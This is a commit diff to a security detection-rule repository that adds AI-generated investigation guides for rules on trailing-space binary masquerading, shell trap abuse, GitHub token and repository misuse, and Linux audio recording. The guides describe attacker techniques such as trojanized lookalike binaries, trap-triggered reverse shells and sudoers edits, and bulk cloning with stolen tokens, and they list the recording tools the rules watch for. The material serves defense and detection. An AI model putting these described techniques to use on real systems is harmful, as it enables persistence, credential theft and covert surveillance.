Prep for Release 9.3 (#5548)

This commit is contained in:
shashank-elastic
2026-01-12 21:07:07 +05:30
committed by GitHub
parent 8b84c26286
commit 1ce072a4e5
99 changed files with 4599 additions and 48 deletions
@@ -2,7 +2,7 @@
creation_date = "2023/08/24"
integration = ["endpoint", "auditd_manager"]
maturity = "production"
updated_date = "2024/12/24"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_mana
language = "eql"
license = "Elastic License v2"
name = "Processes with Trailing Spaces"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Processes with Trailing Spaces
This rule detects execution of binaries whose names end with a space, a Unix-style masquerade that makes a malicious tool visually indistinguishable from a legitimate one and evades default file handling. An attacker pattern is a trojanized clone of ssh, curl, or ps with a trailing space placed in a user-writable PATH directory, then invoked by cron, shell scripts, or launch agents to harvest credentials or stage payloads while blending in.
### Possible investigation steps
- Confirm the binary's presence and trailing space on disk using commands that reveal whitespace (ls -b, find -print0, stat), and compare inode, size, permissions, and mtime against the non-spaced counterpart in the same directory.
- Correlate the event with parent process, effective user, environment (PATH, IFS, aliases), and working directory to determine whether PATH hijacking or script misresolution is being exploited.
- Hash the suspicious executable, check code signing and compiler metadata where applicable, and pivot in threat intel and internal repositories to identify known implants or unauthorized builds.
- Enumerate all directories in PATH for lookalike binaries with whitespace or Unicode homographs, review recent file creations and chmod/chown activity in those paths, and identify the account and host that introduced them.
- Investigate follow-on activity from the same process tree, including network connections, credential access attempts, file writes, and persistence artifacts such as cron entries or macOS LaunchAgents, to determine scope and containment actions.
### False positive analysis
- A legitimate wrapper or init script may use exec -a or setproctitle to set a custom argv[0] with a trailing space for labeling or formatting, causing process.name to end with a space even though the underlying binary is trusted.
- Build or maintenance scripts that fail to trim variables can create and run an executable or symlink whose name includes a trailing space (e.g., when an optional suffix is empty), producing benign events that match this detection.
### Response and remediation
- Terminate the spaced-name process and its parent, stop any cron job or macOS LaunchAgent invoking the spaced executable (e.g., "ssh "), and isolate the host if it initiated outbound connections or prompted for credentials.
- Find and remove or quarantine all executables and symlinks whose filenames end with a space in PATH directories such as ~/bin, /tmp, and project bin paths, using rm -- with exact quoting or null-delimited tools to avoid clobbering the legitimate counterpart.
- Remove persistence and PATH hijacks by deleting cron entries and LaunchAgents referencing the spaced name, restoring PATH for affected users and services to a vetted list, and resetting file ownership and permissions on altered directories.
- Reinstall or restore the legitimate binary from trusted packages or gold images, verify checksums and code signing, update scripts to use absolute paths and trimmed variables, and rotate credentials if the lookalike was a trojan of ssh, curl, or ps.
- Escalate to incident response if the spaced executable resides in system directories (/bin, /usr/bin, /usr/local/bin), runs as root or via sudo, repeatedly respawns after removal, or opens external network connections.
- Harden by enabling file integrity monitoring for filenames with trailing whitespace or Unicode confusables, removing user-writable directories from global PATH and enforcing write protections, configuring cron/launchd with sanitized PATH, and applying noexec or sticky-bit policies on shared temp directories.
"""
risk_score = 21
rule_id = "0c093569-dff9-42b6-87b1-0242d9f7d9b4"
severity = "low"
@@ -27,6 +58,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: Auditd Manager",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2023/08/24"
integration = ["endpoint", "auditd_manager"]
maturity = "production"
updated_date = "2025/12/24"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_mana
language = "eql"
license = "Elastic License v2"
name = "Trap Signals Execution"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Trap Signals Execution
This rule flags use of the shell built-in trap to bind commands to POSIX signals, enabling automatic execution when interrupts like SIGINT, SIGHUP, or SIGTERM occur. Attackers commonly embed traps in bash, zsh, or service scripts so pressing Ctrl+C (SIGINT) or a daemon reload (SIGHUP) silently runs a payload—adding a user to sudoers, planting a setuid helper, or launching a reverse shell—achieving persistence or escalation without a direct command invocation.
### Possible investigation steps
- Pull the full trap command and its arguments plus the parent script path, then read the script to see which signals map to which payloads and whether they perform user, permission, or network actions.
- Determine execution context by user and privilege, TTY/session versus systemd or cron, and whether the shell was invoked with sudo or as root to gauge impact if the trap triggers.
- Correlate telemetry for signal delivery (kill, hangup, termination) to the same process and for immediate follow-on activity such as child process spawns, edits to /etc files, setuid or chmod events, and outbound connections.
- Search the host for other trap definitions in login and init paths (.bashrc, .zshrc, /etc/profile, /etc/*rc, systemd unit scripts, and cron wrappers) to identify persistence or broader tampering.
- Verify legitimacy by comparing the script to package or repository sources and change records, and preserve artifacts (path, hash, mtime, owner) along with shell history and environment for deeper analysis.
### False positive analysis
- Operations or maintenance scripts legitimately declare trap handlers for SIGTERM or SIGHUP to perform cleanup during routine shutdown or reload, producing trap commands with signal arguments that match this detection.
- Interactive shell customization may set a trap on SIGINT (Ctrl+C) to restore terminal settings or print a message on interruption, resulting in benign trap invocations with SIG* arguments.
### Response and remediation
- Isolate the host or TTY session where a trap binds SIGINT/SIGHUP/SIGTERM to commands that write to /etc or open a socket, kill the offending shell and its parent process, and stop/disable any systemd unit or cron wrapper invoking the implicated script path.
- Edit the identified script or rc file (.bashrc, .zshrc, /etc/profile, systemd unit script) to remove or unset the trap handlers, and delete or quarantine any referenced payload such as a reverse-shell binary, sudoers drop-in, or setuid helper.
- Restore altered files from a known-good baseline (e.g., /etc/sudoers, unit .service files, shell RCs), revalidate file ownership and permissions, restart impacted services cleanly, and rotate credentials for users touched by the payload.
- Sweep the host and peers for additional trap definitions by grepping for "trap SIG" in login/init paths and service scripts, and record script path, hash, mtime, and owner to confirm scope and support cleanup.
- Escalate to incident response if the trap executes as root, modifies /etc/sudoers or PAM files, creates setuid files under /usr/bin or /usr/local/bin, or starts a reverse shell to an external IP/port.
- Harden by restricting write access to /etc/*rc and service scripts, enforcing deployment via signed packages, adding audit rules for changes to /etc/sudoers and /etc/profile.d, blocking shells from egress to untrusted networks, and alerting on traps bound to EXIT/DEBUG or signals that invoke privileged actions.
"""
risk_score = 21
rule_id = "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e"
severity = "low"
@@ -27,6 +58,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: Auditd Manager",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,9 +2,9 @@
creation_date = "2025/07/01"
integration = ["azure"]
maturity = "production"
min_stack_comments = "Bug fix in threshold rules."
min_stack_version = "9.0.0"
updated_date = "2025/12/18"
min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases."
min_stack_version = "9.1.0"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -2,7 +2,7 @@
creation_date = "2023/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -16,6 +16,37 @@ index = ["logs-github.audit-*"]
language = "eql"
license = "Elastic License v2"
name = "GitHub Secret Scanning Disabled"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating GitHub Secret Scanning Disabled
This rule triggers when secret scanning is disabled on a repository, signaling an attempt to hide exposed tokens, keys, or passwords that can enable lateral movement, persistence, and data exfiltration. An attacker who gains admin or bot access may disable scanning, push a commit embedding plaintext credentials, and modify a workflow to export them via CI jobs, then use those secrets to authenticate to external services or cloud accounts and expand control.
### Possible investigation steps
- Identify the actor (user, bot, or GitHub App), their auth method and source IP, confirm admin privileges, and validate whether the change was planned and approved.
- Immediately re-enable Secret Scanning and Push Protection on the repository and, if possible, enforce them via an organization policy, recording change control and justification.
- Review commits, pull requests, and workflow file changes near the disable timestamp to detect added plaintext credentials, secret files, or code paths that read or export secrets.
- Examine recent GitHub Actions runs, artifacts, and logs for secrets printed, unusual network egress, or jobs using elevated token scopes, and check for newly added or modified repo/org secrets.
- Correlate IdP, cloud, and third-party service logs for authentication or API activity shortly after the disable event, revoking and rotating any credentials suspected to be exposed.
### False positive analysis
- A repository admin temporarily disables Secret Scanning during a planned maintenance or configuration test to address noisy detections or performance issues, then re-enables it, generating a benign disable event.
- Organization-managed templates or automation enforce a settings baseline that disables Secret Scanning for non-code or ephemeral repos (e.g., mirrors, docs, or test sandboxes), causing the event as part of expected governance.
### Response and remediation
- Immediately re-enable Secret Scanning and Push Protection on the affected repository, lock the default branch with "Require pull request reviews" and "Restrict who can push," and temporarily pause GitHub Actions workflows that access repo or org secrets.
- Revert or rewrite commits made while scanning was disabled to remove credentials from files like .env, config.yml, and .github/workflows/*.yml, and delete build artifacts and caches that may contain sensitive values.
- Revoke and rotate exposed credentials by disabling compromised PATs, rotating cloud API keys and service tokens, and updating organization and repository secrets in Settings > Secrets and variables.
- Validate recovery by confirming Secret Scanning and Push Protection are enabled in repository settings, re-running a full secret scan across HEAD, tags, and protected branches, and restoring merges and deployments only after clean results.
- Escalate to incident response if the actor is unknown or unauthorized, if plaintext secrets appear in commits or workflow logs, or if external authentications use repo-linked credentials within 24 hours of the disable event.
- Harden by enforcing org-wide policies requiring Secret Scanning and Push Protection for all repositories, adding repository rulesets to require status checks and pull request reviews before merging, and limiting Actions token permissions with protected environments and branch protections.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -29,6 +60,7 @@ tags = [
"Use Case: Threat Detection",
"Tactic: Defense Evasion",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2023/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -16,6 +16,37 @@ index = ["logs-github.audit-*"]
language = "eql"
license = "Elastic License v2"
name = "GitHub Private Repository Turned Public"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating GitHub Private Repository Turned Public
This rule flags when a previously private repository is made public, a high-risk change that can expose proprietary code, credentials, and internal documentation. Attackers who hijack a maintainers account often flip visibility via the UI or API, then immediately fork or mirror the repo to an external account to retain access and harvest embedded secrets even if the org reverts the change.
### Possible investigation steps
- Identify the actor and authentication method used for the visibility change, verify their repository role, and confirm the action against an approved change request or ticket.
- Pull a time-bounded audit trail around the event for the actor and repository to surface related risky operations such as forking, transfers, collaborator additions, webhook edits, branch protection changes, or archive downloads.
- Enumerate forks, mirrors, stars, and watchers added after the change via the repository network graph and correlate with external accounts or suspicious clusters.
- Inspect GitHub Actions runs, deployments, and webhooks triggered post-change for workflows that export code or secrets to external destinations.
- Perform rapid secret scanning across the repository history and HEAD, triage any exposed credentials, and initiate rotation while mapping impacted services and environments.
### False positive analysis
- A planned, approved open-source release where a maintainer intentionally flips a sanitized repository from private to public as part of a documented change.
- Bulk visibility changes during an organization-wide cleanup or migration that publishes templates, sample repos, or empty scaffolds, executed by an authorized service account.
### Response and remediation
- Immediately revert the repository to private, remove outside collaborators, lock access to the core maintainers team, disable GitHub Actions and webhooks, and delete any release assets or packages published during the exposure window.
- Enumerate new forks, mirrors, stars, and watchers created after the visibility change and file takedown requests with GitHub Trust & Safety for unauthorized public copies while removing any deploy keys and uninstalling suspicious GitHub App installations added around the event.
- Run a rapid secret scan across the repository history and HEAD, rotate exposed credentials (cloud keys, API tokens, SSH keys), invalidate compromised service accounts, and purge cached artifacts or container images built from the public commit range.
- Restore secure settings from baseline by re-applying branch protection rules, CODEOWNERS, required reviews, signed commits, and protected environments, then re-enable workflows only after reviewing job steps and outputs for any export of code or secrets.
- Escalate to Security IR and Legal if the actor denies making the change, the repo network graph shows new public forks under unknown accounts, regulated data is present, or external users downloaded source zips or release archives during the public period.
- Restrict who can change repository visibility to organization owners, enforce SSO and 2FA for maintainers, disable forking of private repositories, limit Actions to trusted runners and verified actions, and enable secret scanning with push protection across the organization.
"""
risk_score = 21
rule_id = "8c707e4c-bd20-4ff4-bda5-4dc3b34ce298"
severity = "low"
@@ -25,6 +56,7 @@ tags = [
"Tactic: Exfiltration",
"Tactic: Impact",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2025/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ interval = "8m"
language = "esql"
license = "Elastic License v2"
name = "GitHub Exfiltration via High Number of Repository Clones by User"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating GitHub Exfiltration via High Number of Repository Clones by User
This rule flags a single user rapidly cloning dozens of repositories, a strong indicator of bulk source code exfiltration. Mass cloning enables quick siphoning of proprietary code, embedded secrets, and build artifacts across teams before defenses can respond. A typical pattern is a stolen personal access token used in a script to enumerate org repositories and clone them in rapid succession from a CI runner or cloud VM, including private and internal repos, to stage data for off-platform transfer.
### Possible investigation steps
- Validate whether the actor is a known automation or service account with a documented need to mass-clone, and quickly confirm intent with the account owner and affected repo admins.
- Enumerate the cloned repositories and their visibility, deprioritizing activity dominated by public repos while fast-tracking private/internal codebases with sensitive content across orgs.
- Pivot on the token identifier to determine the token owner, scopes, and creation/last-use details, compare to normal usage patterns, and revoke/reset credentials if anomalous.
- Analyze the user agent and agent identifier to attribute the activity to a specific host or CI runner, correlating with pipeline logs and login locations/times for anomalies.
- Correlate with endpoint/network telemetry from the originating host for large outbound transfers, external Git remotes, or bulk archiving indicating off-platform exfiltration following the clones.
### False positive analysis
- A developer rebuilding a workstation or creating an approved local mirror may legitimately clone dozens of repositories in a short window, especially when activity is dominated by public or low-sensitivity repos.
- A shared automation/service account running scheduled builds or org-wide maintenance tasks can trigger fresh clones across many repositories due to pipeline configuration or cache resets, inflating counts without exfiltration intent.
### Response and remediation
- Immediately revoke the GitHub token used for the clones, force sign out, require password reset and 2FA re-verification for the user, and suspend the account if unauthorized.
- Block and quarantine the originating host or CI runner by revoking its runner registration, removing its SSH keys/credentials, and firewalling its IP until imaged.
- On the cloned private/internal repositories, remove the user from teams, rotate or disable deploy keys and GitHub App installations, and enforce SAML SSO.
- Rotate repository and organization secrets present in those repos (Actions secrets, PATs, SSH keys, cloud access keys) and invalidate any secrets found in commit history.
- Recover by restoring only minimal access after owner approval, issuing a new fine-grained PAT with least privilege and expiry, and re-enabling builds while monitoring for further clone bursts.
- Escalate to incident response leadership and Legal if any private or export-controlled repos were cloned or cloning continues post-revocation, and harden by enforcing org-wide SSO, disallowing classic PATs, IP allowlisting for PAT use, enabling secret scanning with push protection, and alerting on burst git clone patterns from runners and unusual user agents.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -28,6 +59,7 @@ tags = [
"Use Case: Threat Detection",
"Tactic: Exfiltration",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2025/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ interval = "8m"
language = "esql"
license = "Elastic License v2"
name = "High Number of Closed Pull Requests by User"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating High Number of Closed Pull Requests by User
This rule flags a single user rapidly closing many pull requests in a short window, a disruptive pattern that suppresses review history, delays releases, and masks unauthorized changes. An attacker with stolen maintainer access mass-closes pull requests across multiple repositories, then force-pushes branches and opens new pull requests that sidestep earlier review threads, making malicious edits appear routine amid churn.
### Possible investigation steps
- Determine if the actor is a bot or sanctioned maintenance by confirming account type, scheduled workflows, and change advisories from repo/org owners.
- Open a sample of the closed PRs to review comments, labels, linked issues, and whether closure coincided with branch deletions, force-pushes, or unusual commit history in the target branches.
- Correlate the closure burst with audit events for permission changes, role assignments, repository settings edits, or protection rule modifications to detect potential sabotage.
- Validate the actors IPs, geolocation, and user agents against baselines and check for recent PAT creations, OAuth app grants, or SSO anomalies indicating credential theft.
- Identify whether closed PRs were immediately replaced by new PRs carrying similar diffs that bypass prior review threads and required checks, and verify branch protection remained enforced.
### False positive analysis
- A maintainer or org-owned bot performs scheduled backlog hygiene, closing stale, duplicate, or superseded PRs across multiple repositories after a default branch rename or policy update, resulting in a high closure count from one account.
- During a planned migration or archival, a release manager closes PRs tied to deprecated branches and consolidates work into new targets, legitimately generating a burst of closures attributed to a single user.
### Response and remediation
- Immediately contain by removing the user from teams with Triage/Write permissions on affected repositories, revoking their personal access tokens from Tokens & keys, and tightening branch protection by disallowing force-pushes and restricting who can push to main and release branches.
- Trigger escalation to Security Incident Response if closed pull requests span more than five repositories within one hour, coincide with branch deletions or forced pushes, or originate from a new user agent/IP, and disable the account at the identity provider while contacting GitHub Support.
- Eradicate impact by reopening legitimate PRs via each closed PR URL, using Restore branch or recreating the head branch from the last known commit SHA, and reapplying required labels and reviewers.
- Recover repository state by comparing diffs of closed PRs to any newly opened PRs by the same user, reverting unauthorized commits in target branches with git revert, and re-running required status checks before merging.
- Harden controls by enforcing branch protection rules (require two approvals, restrict who can dismiss reviews, require signed commits), enabling CODEOWNERS for critical paths, and turning off Allow deletions on default and release branches.
- Prevent recurrence by disabling classic PATs and requiring short-lived fine-grained PATs, revoking unusual OAuth app grants, mandating SSO with hardware-backed MFA, and installing a GitHub App/Action that notifies on PR closures with PR URLs, repos, and branches and requires a reason-coded label per policy.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -29,6 +60,7 @@ tags = [
"Tactic: Impact",
"Tactic: Exfiltration",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2025/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -16,6 +16,37 @@ interval = "8m"
language = "esql"
license = "Elastic License v2"
name = "Several Failed Protected Branch Force Pushes by User"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Several Failed Protected Branch Force Pushes by User
This rule flags a single user generating multiple failed force push attempts to protected branches within a short span, indicating attempts to rewrite commit history and bypass branch protections. An attacker with a compromised maintainer role repeatedly tries to roll back a security fix, delete prior commits, and erase history entries before pushing a malicious revision. This activity threatens code integrity, disrupts pipelines, and can propagate harmful changes across repositories.
### Possible investigation steps
- Pull audit entries for the rejected updates to confirm the rejection reasons and the exact org/repo/branch targets, then reconstruct the timeline and sequence of attempts.
- Verify the user's current and recent permissions, team membership, and role changes, and confirm whether any admin or ownership transfers occurred before the attempts.
- Correlate the attempts with authentication and token activity (SSO logins, PAT/SSH key usage, IP/device fingerprints, geo), flagging any new or unusual sources.
- Review branch protection settings and recent edits (require status checks, linear history, admin enforcement, force push exemptions) to detect policy tampering or misconfiguration.
- Identify the specific commits the force pushes sought to overwrite by diffing the attempted ref against the protected branch head, prioritizing impacts to security fixes, release branches, or signed commits.
### False positive analysis
- During a repository migration or history cleanup, a maintainer runs a local script that loops through branches and tries to push rewritten commits with --force, but newly tightened branch protection rejects each attempt, resulting in multiple failures.
- A developer who previously had a force-push exemption on a protected release branch loses that permission during a role or team change and continues their usual rebase-and-force-push workflow, causing several rapid rejected ref updates.
### Response and remediation
- Immediately block the user in the GitHub organization, revoke all active personal access tokens and SSH keys from their account, and force sign-out to stop further push attempts.
- On each affected repository and branch (e.g., main, release/*), remove any force-push exemptions, enable “Include administrators,” require signed commits and status checks, and restrict push access to specific teams.
- Purge staging artifacts by deleting any branches or tags the user created around the attempts, rotate the users password and regenerate PATs/SSH keys, and remove newly registered keys or OAuth apps added during the window.
- Validate recovery by confirming the protected branch HEAD matches the last known good signed commit SHA, re-running CI for impacted repos, and creating a restore point tag for rapid rollback.
- Escalate to incident response if any attempts targeted main or release branches, originated from a newly created PAT/SSH key or an unrecognized IP/device, or the user holds repo admin/organization owner rights.
- Harden long term by enforcing org-wide 2FA/SSO, removing all standing force-push exemptions, requiring CODEOWNERS approvals on protected branches, and enabling audit alerts for branch protection edits and new credential creation.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -30,6 +61,7 @@ tags = [
"Tactic: Impact",
"Tactic: Exfiltration",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2025/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -16,6 +16,37 @@ interval = "8m"
language = "esql"
license = "Elastic License v2"
name = "High Number of Protected Branch Force Pushes by User"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating High Number of Protected Branch Force Pushes by User
This rule flags a single user performing many force pushes to protected branches in a short window, signaling aggressive history rewrites on critical repositories. Such activity can erase commits, hide unauthorized changes, and disrupt builds or releases, indicating potential data destruction or sabotage. Example: a compromised maintainer acquires elevated access and repeatedly force-pushes rewritten history to the main branch to purge prior commits, remove security fixes, and introduce a backdoor while bypassing merge protections.
### Possible investigation steps
- Verify the user's current and recent org/repo roles and bypass permissions, along with any recent elevation, SSO changes, or new PAT/GitHub App installations linked to the account.
- Enumerate impacted repositories and protected branches, then reconstruct the overwritten history by comparing before/after SHAs from audit logs or local mirrors to determine what commits were removed or rewritten.
- Assess intent and legitimacy by contacting repo owners and checking change tickets or maintenance windows for planned history rewrites, and suspend override permissions if unplanned while preserving forensic evidence.
- Analyze sign-in and authentication telemetry around the events (IP, geo, MFA status, device, OAuth/PAT/App identifiers, off-hours) to spot account compromise indicators and pivot to other activity by the same token.
- Review diffs of the resulting branch heads and CI/CD artifacts to detect malicious changes (e.g., removed security fixes, inserted secrets/backdoors), and check for anomalous releases or workflows triggered by the rewritten commits.
### False positive analysis
- An authorized maintainer conducts a planned history rewrite (rebases/resets to remove problematic commits) across protected branches in multiple repositories, legitimately invoking policy overrides and issuing many force pushes in quick succession.
- A release owner executes an emergency rollback by resetting protected branches to a known-good commit across several repositories, causing repeated, intentional force pushes and protected-branch overrides.
### Response and remediation
- Immediately contain by removing the user from repo admin/maintain teams, revoking all active PATs/OAuth/App tokens linked to the account, and updating branch protection on affected branches to disallow force pushes and restrict pushes to a small trusted group.
- Freeze each impacted protected branch by creating an annotated tag at the last known-good commit SHA prior to the force pushes and temporarily pausing CI/CD workflows that build from those branch heads.
- Recover by restoring each branch head to the last known-good commit or signed tag from a trusted mirror/backup, verifying the target SHA, and re-enabling protections and required status checks after integrity confirmation.
- Eradicate unauthorized changes by diffing the pre-override and post-override branch heads, reverting malicious edits, rotating repository secrets referenced in code/workflows, and removing suspicious GitHub Apps installed by the user.
- Escalate to incident response and legal if any overwritten history includes production release branches or signed tags, if the user denies authorization, or if pushes originated from a new token/App unknown to repo owners.
- Harden by enforcing rulesets that block force pushes and require linear history on main and release/* branches, enabling CODEOWNERS-required reviews and signed commits, limiting bypass permissions to a small admin group, and using deploy keys or CI bots with short-lived tokens for pushes.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -30,6 +61,7 @@ tags = [
"Tactic: Impact",
"Tactic: Exfiltration",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2023/12/16"
integration = ["github"]
maturity = "production"
updated_date = "2025/12/16"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["logs-github.audit-*"]
language = "eql"
license = "Elastic License v2"
name = "New GitHub Personal Access Token (PAT) Added"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating New GitHub Personal Access Token (PAT) Added
This alert triggers when someone creates and authorizes a new GitHub personal access token, signaling a fresh longlived credential that outlasts sessions and enables broad API access. A common abuse path: after compromising a developer account, the adversary mints a PAT with repo and organization scopes and uses it from an external host to enumerate and clone private repositories via the API.
### Possible investigation steps
- Retrieve token details (type finegrained vs classic, scopes, repository/org binding, and expiration) and verify they match the users role and leastprivilege expectations.
- Correlate the creation IP, geolocation, and user agent with the users recent login history and corporate network ranges to identify anomalous origin.
- Determine whether the token is SSOenforced and organizationscoped; lack of SSO or broad classic scopes increases risk and warrants expedited review.
- Pivot to recent Git and API events by this actor since the token was created to see private repo enumeration/clones or org/admin actions indicating misuse.
- Check for concurrent account security changes (2FA status modifications, new SSH/GPG keys, email/password changes, or OAuth app grants) that suggest account takeover and escalate if present.
### False positive analysis
- A developer performs planned token rotation or migrates from a classic to a finegrained PAT to comply with expiration and leastprivilege policies, generating a legitimate personal_access_token.access_granted creation event.
- Expected onboarding or maintenance activities create PATs for service or automation use with scoped repository access and set expiration, producing anticipated alerts from known corporate locations.
### Response and remediation
- Revoke the specific PAT referenced in the alert via GitHub UI or API immediately, and temporarily lock the user account if the tokens origin, scopes, or target repositories are not expected.
- If any activity is observed with this PAT, rotate repository and organization secrets, remove newly added deploy keys and suspicious OAuth app grants, and strip unauthorized collaborator or team role changes.
- Force a password reset for the account owner, invalidate active sessions, require fresh 2FA re-enrollment, and delete any other nonessential PATs before restoring normal access.
- Review audit and repository logs for API calls authenticated with this PAT since its creation, block offending source IPs in network controls, and enable GitHub IP allow lists or SSO enforcement to restrict token use to trusted contexts.
- Escalate to incident response if the PAT has admin or organization owner scopes, was created from an unfamiliar location or device, or was used to clone private repositories or change security settings.
- Harden going forward by enforcing fine-grained, expiring, SSO-enforced PATs, disabling classic tokens at the organization, requiring approval for new PATs, and migrating automation to GitHub Apps with least-privilege permissions.
"""
references = [
"https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack",
"https://trigger.dev/blog/shai-hulud-postmortem",
@@ -29,6 +60,7 @@ tags = [
"Tactic: Persistence",
"Tactic: Credential Access",
"Data Source: Github",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -19,6 +19,37 @@ index = [
language = "kuery"
license = "Elastic License v2"
name = "Linux Audio Recording Activity Detected"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux Audio Recording Activity Detected
This rule flags executions of Linux audio-recording tools (arecord, parec, pw-record, ecasound, pw-cat -r, ffmpeg) started by uncommon parent processes, signaling potential covert microphone capture. Attackers often drop a systemd service or cron job that silently invokes arecord or ffmpeg to record from default PulseAudio/PipeWire devices and stash WAV/MP3 files under user directories or stream them to a remote host. Capturing ambient audio can reveal passwords, meeting content, and sensitive conversations, aiding reconnaissance and espionage.
### Possible investigation steps
- Examine the full process tree and session context (parent/grandparent, controlling TTY, logged-in user) to determine whether launch came from an expected desktop workflow versus non-interactive origins like cron, systemd, or ssh.
- Parse the command line to identify input device and output target, then hunt for created artifacts (WAV/MP3/OGG) under common stash paths (~/.cache, ~/.local/share, /tmp, /var/tmp, hidden directories) and verify timestamps and owner.
- If the command indicates streaming or piping, inspect recent outbound network connections and DNS from the process/user for RTMP/HTTP/SFTP endpoints and correlate with firewall or EDR flow logs to detect exfiltration.
- Check for persistence mechanisms that could re-invoke the recorder, including systemd user/system units and timers, cron/anacron entries, and shell scripts in autostart paths, and disable or quarantine any suspicious items.
- Review audio subsystem and device access evidence (audit logs for open/read on /dev/snd/* and PipeWire/PulseAudio logs showing record nodes) to confirm capture and identify the device and scope.
### False positive analysis
- ffmpeg is executed with -i to read an existing media file for transcode or audio extraction, not to capture from a microphone, which satisfies the rule conditions but is routine multimedia processing.
